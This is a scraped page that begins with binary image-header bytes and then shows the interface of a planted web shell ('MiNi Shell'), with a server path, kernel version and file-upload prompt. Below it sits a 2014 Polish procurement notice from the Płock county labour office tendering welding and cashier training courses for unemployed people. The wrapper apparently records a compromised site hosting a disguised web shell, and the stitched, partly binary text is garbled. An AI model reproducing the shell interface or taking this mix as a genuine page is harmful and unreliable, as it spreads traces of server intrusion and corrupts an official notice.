JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140206/24103-N-2014.html

<p class="kh_header"><b>Płock: Usługa szkoleniowa współfinansowana przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w ramach projektu Aktywny bezrobotny kapitałem płockiej wsi w ramach Priorytetu VI Rynek Pracy Otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych</b><br>
<b>Numer ogłoszenia: 24103 - 2014; data zamieszczenia: 06.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Płocku , ul. Kostrogaj 1, 09-400 Płock, woj. mazowieckie, tel. 024 2674630, faks 024 2674631.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa szkoleniowa współfinansowana przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w ramach projektu Aktywny bezrobotny kapitałem płockiej wsi w ramach Priorytetu VI Rynek Pracy Otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1
Organizacja i przeprowadzenie szkolenia dla osób bezrobotnych zarejestrowanych  w Powiatowym Urzędzie Pracy w Płocku pn. Spawanie metodą TIG - 141/111 - TUV    
1.Miejsce szkolenia :   Płock
2.Termin szkolenia :    marzec - maj 2014 r.
3.Ilość uczestników szkolenia: 15 osób bezrobotnych zarejestrowanych w PUP     w Płocku z wykształceniem bez znaczenia.
4.Szkolenie powinno być realizowane wg. planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu tzn. 4-6 razy w tygodniu, nie więcej niż po 8 godzin dziennie.
5.Kod Wspólnotowego Słownika Zamówień:   (CPV) - 80530000-8
6.Szkolenie powinno zakończyć się egzaminem TUV .
7.Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej                      (www.standardyiszkolenia.praca.gov.pl) oraz obowiązującymi i przyjętymi do realizacji  wytycznymi.
Zakres szkolenia: (grupa materiałowa I)
-spawanie blach i rur spoinami pachwinowymi metodą TIG - 141
-spawanie blach i rur spoinami czołowymi metodą TIG - 141
-spawanie blach i rur elektrodami otulonymi - spoiny pachwinowe 111
-spawanie blach i rur elektrodami otulonymi - spoiny czołowe 111
-powyższe zagadnienia obejmują teorię i praktykę 
-przepisy bhp i p. poż.
8.egzamin- przeprowadzony bezpośrednio po zakończeniu zajęć - bez możliwości przedłużenia kursu o następny dzień.
9.Program szkolenia powinien zawierać min. 300 godz. podzielonych na część teoretyczną i praktyczną.
10.Wykonawca zobowiązany jest przed rozpoczęciem szkolenia przeprowadzić na wniosek PUP wszystkim osobom zakwalifikowanym niezbędne profilaktyczne badania lekarskie.
11.Wykonawca zobowiązany jest do zapewnienia uczestnikom szkolenia odzieży ochronnej.
12.Sala wykładowa powinna być dostosowana do ilości osób skierowanych na szkolenie oraz każdy uczestnik powinien mieć zapewniony indywidualny dostęp do sprzętu spawalniczego na zajęciach praktycznych.
Część nr 2 
Organizacja i przeprowadzenie szkolenia dla osób bezrobotnych zarejestrowanych  w Powiatowym Urzędzie Pracy w Płocku pn. Sprzedawca z obsługą kasy fiskalnej i komputera   
1.Miejsce szkolenia :     Płock.
2.Termin szkolenia :      kwiecień - maj  2014 r.
3.Ilość uczestników szkolenia: 15 osób bezrobotnych zarejestrowanych w PUP     w Płocku z wykształceniem od zawodowego.
4.Szkolenie powinno być realizowane wg. planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu tzn. 4-6 razy w tygodniu, nie więcej niż po 8 godzin dziennie.
5.Kod Wspólnotowego Słownika Zamówień:   (CPV) - 80530000-8.
6.Sala wykładowa powinna być dostosowana do ilości osób skierowanych na szkolenie. Każdy uczestnik powinien mieć zapewnioną kasę fiskalną/lub komputer    z programem kasy fiskalnej oraz sprzęt komputerowy, dostęp do drukarki. 
Budynek i pomieszczenia do prowadzenia zajęć na szkoleniu powinny spełniać wymogi dostępu dla osób niepełnosprawnych.
7.Wykonawca zobowiązany jest przed rozpoczęciem szkolenia przeprowadzić na wniosek PUP wszystkim osobom zakwalifikowanym niezbędne profilaktyczne badania lekarskie w tym również badania do celów sanitarno - epidemiologicznych z wpisem do książeczki zdrowia.
8.Program szkolenia powinien zawierać min. 150 godzin podzielonych na część teoretyczną i praktyczną  i egzamin przeprowadzony bezpośrednio po zakończeniu zajęć (o ile jest przewidziany w programie szkolenia) - bez możliwości przedłużenia kursu o następny dzień.
9.Program szkolenia musi być sporządzony zgodnie z Modułowymi Programami Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej  (www.standardyiszkolenia.praca.gov.pl) oraz obowiązującymi i przyjętymi do realizacji  wytycznymi.  
Program szkolenia powinien zawierać zagadnienia z zakresu:
- Prawne aspekty sprzedaży
umowa sprzedaży
reklamacja  
gwarancja itp.
- Organizacja pracy sprzedawcy
- Elementy rachunkowości - dokumentacja sprzedaży
- Inwentaryzacja i jej funkcja kontrolna
- Przestrzeganie przepisów i zasad bhp i ppoż.
- Praktyczna nauka obsługi kas fiskalnych oraz urządzeń współpracujących 
podstawy obsługi komputera (WORD, Internet)
przyjmowanie płatności kartą płatnicza
operacje rejestracji i sprzedaży 
kody kreskowe
- Trening umiejętności sprzedaży i obsługi klienta
Dotyczy części nr 1 i nr 2:
- Wykonawca zapewnia uczestnikom szkolenia w trakcie jego realizacji napoje: woda, herbata, kawa oraz dodatki tj. cukier, mleko lub śmietanka, cytryna.
- Wykonawca zakupi i przekaże na własność każdemu uczestnikowi kursu  materiały szkoleniowe: skrypt zgodny z kierunkiem szkolenia, zeszyt, długopis, teczka skrzydłowa (wykonana z twardej i sztywnej tektury o grubości 2mm, powlekana folią PP, na dokumenty formatu A4, zamykana np. na rzep, gumkę ). Odbiór materiałów dydaktycznych i biurowych potwierdzony zostanie przez każdego uczestnika podpisaniem stosownego oświadczenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, Zamawiający żąda by wykazał, iż prowadzi instytucję szkoleniową w rozumieniu ustawy z dnia 20 kwietnia 2004r o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity: Dz. U. z 2013r, poz. 674 z późn. zmianami)  - posiada wpis do rejestru instytucji szkoleniowych.
Ocena spełnienia warunku dokonana będzie przez Zamawiającego poprzez weryfikację wpisu do RIS w elektronicznej bazie danych prowadzonych przez WUP właściwy ze względu na siedzibę instytucji szkoleniowej. Warunek zostanie spełniony jeśli, Wykonawca będzie figurował w RIS na dzień składania ofert. 
Wykonawca może dołączyć do oferty zaświadczenie o wpisie do RIS</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.
Ocena spełnienia warunku dokonana będzie przez Zamawiającego na podstawie  oświadczenia z art. 22 ust 1 ustawy Prawo Zamówień Publicznych złożonego przez Wykonawcę - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym, Zamawiający żąda by wykonawca wykazał, iż dysponuje:
Dot. części nr 1
- co najmniej jednym pomieszczeniem przystosowanym do prowadzenia zajęć teoretycznych dla  minimum  15 uczestników wraz z dostępem do pomieszczeń sanitarnych w budynku, w którym odbywają się zajęcia,
- spawalnią spełniającą warunki zgodne z Rozporządzeniem Ministra Gospodarki      z dnia 27 kwietnia 2000r. w sprawie bezpieczeństwa i higieny pracy przy pracach spawalniczych (Dz. U. Nr 40 poz. 470  z 2000r.) oraz zgodnie z przepisami ochrony przeciwpożarowej. 
Dot. części nr 2
- co najmniej jednym pomieszczeniem przystosowanym do prowadzenia zajęć teoretycznych i praktycznych z zapewnioną dla każdego uczestnika kasą fiskalną/lub komputerem z programem kasy fiskalnej oraz sprzętem komputerowym i dostępem do drukarki dla  minimum 15 uczestników wraz z dostępem do pomieszczeń sanitarnych w budynku, w którym odbywają się zajęcia. 

Wykonawca może polegać na odpowiednim potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.  Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował odpowiednim sprzętem niezbędnym do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędny potencjał techniczny na okres korzystania z niego przy wykonywaniu zamówienia.

Ocena spełnienia warunku dokonana będzie przez Zamawiającego na podstawie opisu sporządzonego przez Wykonawcę na załączniku nr 11 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla uznania, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający żąda, aby Wykonawca wykazał, że na czas realizacji zamówienia będzie dysponował:
Dot. części nr 1
a) co najmniej dwoma osobami do prowadzenia zajęć teoretycznych z przedmiotu zamówienia (każdy moduł szkolenia może prowadzić inna osoba), które posiadają:
- wykształcenie minimum średnie,
- doświadczenie zawodowe polegające na przeprowadzeniu co najmniej 100 godzin dydaktycznych o tematyce zgodnej lub zbliżonej do modułu - kierunku szkolenia    w okresie trzech lat przed upływem terminu składania ofert;
b) co najmniej dwoma osobami do prowadzenia zajęć praktycznych z przedmiotu zamówienia, które posiadają:
- wykształcenie co najmniej zawodowe,
-  uprawnienia spawacza,
- doświadczenie zawodowe polegające na przeprowadzeniu co najmniej 100 godzin praktycznych w zakresie objętym kierunkiem szkolenia w okresie trzech lat przed upływem terminu składania ofert.
Dot. części nr 2
a.co najmniej dwoma osobami do prowadzenia zajęć teoretycznych z przedmiotu zamówienia (każdy moduł szkolenia może prowadzić inna osoba), które posiadają:
- wykształcenie wyższe,
- doświadczenie zawodowe polegające na przeprowadzeniu co najmniej 100 godzin dydaktycznych o tematyce zgodnej lub zbliżonej do modułu - kierunku szkolenia   w okresie trzech lat przed upływem terminu składania ofert;
b. co najmniej dwoma osobami do prowadzenia zajęć praktycznych z przedmiotu zamówienia, które posiadają:
- wykształcenie wyższe,
- doświadczenie zawodowe polegające na przeprowadzeniu co najmniej 100 godzin praktycznych w zakresie objętym kierunkiem szkolenia w okresie trzech lat przed upływem terminu składania ofert.

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych   
podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.  Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich  przy wykonywaniu zamówienia.
Ocena spełnienia warunku dokonana będzie przez Zamawiającego na podstawie opisu sporządzonego przez Wykonawcę na załączniku nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie doprecyzowuje tego warunku.
Ocena spełnienia warunku dokonana będzie przez Zamawiającego na podstawie  oświadczenia z art. 22 ust 1 ustawy Prawo Zamówień Publicznych złożonego przez Wykonawcę - załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Sporządzony przez wykonawcę Formularz oferty - załącznik nr 1 do SIWZ (oddzielnie dla każdej części zamówienia).
2.Program szkolenia sporządzony przez Wykonawcę  - załącznik nr 6 (oddzielnie dla każdej części zamówienia). 
3. Szczegółowa kalkulacja kosztów szkolenia sporządzona przez Wykonawcę - załącznik nr 7 (oddzielnie dla każdej części zamówienia).
4. Wzór zaświadczenia Instytucji Szkoleniowej o ukończeniu szkolenia załącznik nr 9 - sporządza Wykonawca zgodnie z wymogami określonymi w umowie.
5.Wzór ankiety dla uczestników szkolenia służącej do oceny szkolenia - załącznik nr 10 (sporządza Wykonawca),
6. Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona do podpisania na podstawie dokumentu wymienionego w rozdziale XIV ust 3 pkt.  3.2. - w oryginale lub poświadczone notarialnie.
7. Informacja dot. podwykonawców - załącznik nr 8.
8. Dyplom o ukończeniu szkoleniu - wg wzoru - załącznik nr 14 do SIWZ,
9. Wzór uprawnień TUV - dot. części nr 1</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Kwalifikacje i doświadczenie kadry dydaktycznej - 25</li>
<li>3 - Poświadczenie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy.
Zmiany przewidziane w umowie mogą być inicjowane przez Zamawiającego lub Wykonawcę pod warunkiem uzyskania akceptacji drugiej strony umowy.
Zmiany umowy nie mogą wykraczać poza zakres świadczenia określony w SIWZ.
Zmiany mogą dotyczyć:
a)zmiany osób wykonujących usługę,
b)zmiany terminu wykonania usługi,
c) zmiany miejsca wykonywania szkolenia,
d) zmiany wynagrodzenia,
e) zmiany podwykonawców - na zasadach określonych w art. 36b ust. 2 ustawy Prawo Zamówień Publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.powiat-plock.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Płocku, ul. Kostrogaj 1 09-400 Płock pok. 28a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2014 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Płocku, ul. Kostrogaj 1 09-400 Płock sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa szkoleniowa współfinansowana przez Unię Europejską w ramach Europejskiego Funduszu Społecznego w ramach projektu Aktywny bezrobotny kapitałem płockiej wsi w ramach Priorytetu VI Rynek Pracy Otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja i przeprowadzenie szkolenia dla osób bezrobotnych zarejestrowanych                          w Powiatowym Urzędzie Pracy w Płocku pn. Spawanie metodą TIG - 141/111 - TUV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Miejsce szkolenia :   Płock
Termin szkolenia :    marzec - maj 2014 r.
Ilość uczestników szkolenia: 15 osób bezrobotnych zarejestrowanych w PUP        w Płocku z wykształceniem bez znaczenia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Kwalifikacje i doświadczenie kadry dydaktycznej - 25</li>
<li>3. Poświadczenie przez instytucję szkoleniową certyfikatu jakości usług - 5</li>
</ul>
</li>
</ul><br>
